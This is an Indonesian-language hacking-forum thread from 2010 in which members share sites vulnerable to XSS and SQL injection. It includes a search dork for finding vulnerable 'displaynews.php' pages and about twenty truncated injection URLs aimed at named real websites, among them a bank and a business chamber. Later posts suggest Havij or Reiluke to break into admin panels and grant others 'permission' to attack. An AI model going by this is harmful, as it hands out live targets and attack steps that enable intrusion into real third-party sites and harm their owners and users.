Cyber Security Forum (X-code) - PT. Teknologi Server Indonesia

The largest cyber security forum in Indonesia with more than 129000 members
http://xcode.or.id/forum/

Multiple Vulnerability (XSS+SQLi)

http://xcode.or.id/forum/viewtopic.php?f=99&t=39675

Page 1 of 2

Multiple Vulnerability (XSS+SQLi)

Posted: Thu Jun 24, 2010 11:40 pm
by Darkzzzz
:maaf: Kalo repost atau udah pernah :maaf:
Ane baru nemu beberapa jam yang lalu :tapa:

intitle:"Highdesert news"
vuln : http://website.xxx/displaynews.php?id=<sql + xss/html>

POC :
http://silverlakesmcf.com/displaynews.p ... c%3C/h1%3E

http://theapplevalleynews.com/displayne ... c%3C/h1%3E

http://thesilverlakesnews.com/displayne ... c%3C/h1%3E

http://thespringvalleynews.com/displayn ... c%3C/h1%3E

http://thespringvalleylakenews.com/disp ... c%3C/h1%3E

http://thevictorvillenews.com/displayne ... c%3C/h1%3E

Re: XSS + MySql Error

Posted: Fri Jun 25, 2010 12:29 am
by Tool3
:kaca:

keren wkwkwkwk awas kena bugss.......

Re: XSS + MySql Error

Posted: Fri Jun 25, 2010 12:49 am
by Darkzzzz
Nambah ah, mumpung ane belon ngantuxXx

http://www.connexions-bury.com/latest_n ... e%3C/h1%3E

http://www.connexions-stockport.com/lat ... e%3C/h1%3E

http://www.connexions-stockport.org.uk/ ... e%3C/h1%3E

http://www.darwincyclingclub.com/news/d ... e%3C/h1%3E

http://www.experis.com/displaynews.php? ... e%3C/h1%3E

http://www.iccj.or.jp/displaynews.php?i ... e%3C/h1%3E

http://www.innodelta.net/nrwnl/_system/ ... e%3C/h1%3E

http://www.nccbank.com.np/displaynews.p ... e%3C/h1%3E

http://www.show-canada.com/app/template ... e%3C/h1%3E

http://newsftp3.an.tv/s/?sid=5%3E%3Cscr ... e%3C/h1%3E

http://www.mcflyofficial.com/news/index ... e%3C/h1%3E

http://www.comingsoon.net/news/movienew ... e%3C/h1%3E

http://www.asianewsnet.net/news.php?sec ... e%3C/h1%3E

http://www.selenetrawlers.com/news-id.p ... e%3C/h1%3E

Thanks to : Bang Poni atas tutorial Havijnya & Thanks to Wilmar Kidz atas Indosiarnya... :love:

Re: Multiple Vulnerability (XSS+SQLi)

Posted: Sat Jun 26, 2010 6:42 am
by RJ-45
terus lo mau masuk ke adminnya gmana kakak.......!

Re: Multiple Vulnerability (XSS+SQLi)

Posted: Sat Jun 26, 2010 10:23 am
by Darkzzzz
Cari aja pake Havij atau nggak pake Reiluke, tutornya khan dah dijelaskan sama bang Poni...
Tapi kalo targetnya joomla sih nggak masalah, tinggal /administrator/ ;)

Re: Multiple Vulnerability (XSS+SQLi)

Posted: Sat Jun 26, 2010 10:40 pm
by RJ-45
lo gitu ijin lakuin SQLI kakak....................!
:devil :devil :devil :devil :licik: :licik: :licik: :licik: :licik: :licik:

Re: Multiple Vulnerability (XSS+SQLi)

Posted: Sun Jun 27, 2010 8:08 am
by Darkzzzz
Dipersilahkan...

Re: Multiple Vulnerability (XSS+SQLi)

Posted: Tue Jun 29, 2010 9:32 am
by andryh4ever
Wew DJ XSS beraksi lagi.. :kaca:

Re: Multiple Vulnerability (XSS+SQLi)

Posted: Tue Jun 29, 2010 9:49 am
by anharku
wag master XSS nya beraksi :love:

Re: Multiple Vulnerability (XSS+SQLi)

Posted: Tue Jun 29, 2010 4:53 pm
by Nol Sembilan Tiga
ijin nimbrung juga.. :devil :love:
All times are UTC+07:00
Page 1 of 2
Powered by phpBB® Forum Software © phpBB Limited
https://www.phpbb.com/